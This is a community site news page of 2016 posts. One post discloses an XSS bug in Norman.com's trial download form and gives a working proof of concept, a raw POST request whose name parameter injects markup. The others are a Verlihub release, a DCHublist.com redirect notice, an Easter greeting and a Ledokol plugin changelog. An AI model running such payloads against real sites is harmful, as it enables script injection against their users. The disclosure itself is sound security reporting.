This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
Русский, Россия Svenska, Sverige
RSS
18.97.9.169.US.SSL
News News Work Work Network Network Forum Forum Gallery Gallery Hublist Hublist Tools Tools Statistics Statistics About About Login Login

Norman.com download submission form XSS bug

Vulnerable page: http://www.norman.com/home_and_small_office/trials_downloads/

Specified page shows a frame linked from http://newton.norman.com/, so you have to post to that frame in order for XSS to work.

PoC
POST /reg.php HTTP/1.1
Host: newton.norman.com
name="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in name input box, or request any XSS code directly using POST method and name parameter.

PoC
PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2016-04-09 23:27 0 comments 7 likes

Verlihub Verlihub 1.0.0.0

First stable release in 1.0.0.0 series.

Changes in 1.0.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.0.0.0
Posted by verlihub on 2016-04-05 10:54 1 comment 8 likes

DCHublist.com

Many of you are probably wondering: What really happened with DCHublist.com and why is it pointing here? Yep, that's right, it's pointing here because I am close friend with people who wrote and managed it during all these years. The time has passed and developers were no longer interested in keeping it, so they left it to me, both source code and domain name. Now dchublist.com is redirecting to our own hublist.

By the way, if you are missing something that used to be on DCHublist.com, please send us a feature request either by forum or contact form, I'm sure that your feature will be added, mainly because I'm the developer here. tongue2

Oh, also all client side lists that are still present in most DC clients, are still working, with a single redirect though. Complete URL list can be found here.

Have fun using Team Elite Hublist.
Posted by RoLex on 2016-03-30 12:50 3 comments 9 likes

Happy Easter

Happy Easter
Posted by RoLex on 2016-03-26 13:42 2 comments 8 likes

Ledokol Ledokol 2.8.9.16

Changes in 2.8.9.16
[  6] Fixed: Chat replacer feature now replaces all occurrences of an entry instead of first only
[  6] Fixed: Possible error when unloading Lua plugin, report by KCAHDEP
[ 11] Fixed: Search filter block list was never blocking
[ 12] Fixed: Escape of special characters in chat messages from other scripts, report by KCAHDEP
[ 12] Fixed: Incorrect position of next word in chat replacer, report by KCAHDEP
[ 13] Fixed: Error when settings some configurations to empty value
[  5] Added: Support for new VH_OnParsedMsgSupports callback
[  8] Added: Search filter actions 8 and 9 to block all next search requests from user, action 8 is silent
[  9] Added: Chat replacer exception types, 0 = nick, 1 = IP and 2 = LRE, request by KCAHDEP
[ 10] Added: Hub URL to user information when available
[ 11] Added: sefiblockdel to delete user from search filter block list on logout
[ 11] Added: sefibllist command to show users in search filter block list
[ 11] Added: sefibldel command to delete users from search filter block list
[ 14] Added: Take advantage of VH_OnSetConfig callback if supported by hub
[ 15] Added: Support for opchat_to_all script command, external scripts can use this to send operator chat history line to Ledokol
[ 16] Added: Requirement to gain some uptime in order to use public and private chats and related commands
[ 16] Added: Notification on low registration, search and chat uptimes
[  7] Removed: Infected user redirect to AVDB quarantine hub

File information: Ledokol 2.8.9.16
Posted by ledokol on 2016-03-23 14:41 0 comments 5 likes
222324252627282930
18.97.9.169.US.SSL Copyright © 2002-2025 Team Elite ⋅ All rights reserved ⋅ CookiesHelpContact 2 971 3140